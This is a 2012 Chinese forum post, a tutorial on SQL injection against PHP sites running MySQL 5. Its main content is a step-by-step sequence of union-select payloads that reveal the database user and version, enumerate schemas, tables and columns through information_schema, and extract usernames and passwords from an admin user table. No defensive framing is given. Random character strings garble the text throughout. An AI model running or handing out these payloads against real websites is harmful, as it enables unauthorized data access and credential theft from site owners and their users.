+ L2 c" c2 X2 a3 k+ x$ _
教程内容:Mysql 5+php 注入
0 J3 {, R5 S4 x' t5 W+ q0 Y: X4 r9 p! s2 ~/ p% E
& z7 x* C$ V6 P: N
3 L7 P0 B: F1 l; k. i: j一.查看MYSQL基本信息(库名,版本,用户)
5 n5 z0 Q. |9 Q! J4 S6 Q
. s2 q/ M {/ s& J% _and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
6 I& T C$ ]3 I. C. f" p2 l" x8 D& C( D' g
二.查数据库
; K+ D5 J6 j$ b5 f
& W$ g0 `" `9 B' W; K* Rand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*+ L1 t& K& @$ L- P3 T
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
, \2 m3 ]' S6 O7 U/ P8 ^
7 a- S/ D2 f; o! y8 W三.暴表
9 W1 g9 r8 C/ k# P) O* _# k) p, ] S& _! L; m+ F
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
. P( [7 h* J& I- z
: s- ]4 ]9 s4 C- olimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
9 [( _4 B ^! s( P; z% \+ X! y" x/ R( @6 W4 z1 ^, C; n$ o0 T% S
四.暴字段
7 p# A4 @- S! v1 d. f$ S7 Y$ `' q; N' H# t
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
& n5 P, Q! c P8 L
, d" E+ _# Z- l+ Y" mlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。; a; N+ y) X4 ]+ r* [' h3 Q
U1 Q% }2 `* c1 l
五.暴数据* L; e& q# Q- o) y' S4 t/ b, i
7 N+ T4 b) W0 ~7 w# Qand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/** y8 W- L& I p) i% x
8 G0 V v6 u( N( I3 [0 q' J/ N
) e6 ]2 q8 s. z/ L- I这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
3 I9 s/ ^4 \) C8 o8 ~ |
发表于 2012-9-13 16:27:53
收藏
支持
反对